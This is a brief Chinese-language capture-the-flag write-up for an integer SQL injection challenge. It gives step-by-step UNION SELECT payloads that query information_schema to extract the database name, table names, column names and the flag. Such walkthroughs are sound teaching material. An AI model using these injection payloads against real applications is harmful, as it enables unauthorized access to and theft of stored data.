1.按照题目要求输入1出现回显,首先判断是否有注入点,由于题目指明了整型注入
2.判断回显位,输入1和2是有回显的,输入3报错可知该表中字段只有两列
3.开始爆破库名,通过联合查询语句,联合查询之前的值设为一个不存在的值,不然显示不出来
-1 union select 1,database()#;
得到数据库名为sqli
4.通过group_concat()函数和information_schema爆破表名,
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
得到两个表名,可想而知我们的flag存在flag表中
5.开始爆破列名
-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'
得到列名为flag
6.开始爆破具体内容
-1 union select 1,group_concat(flag) from sqli.flag
成功得到flag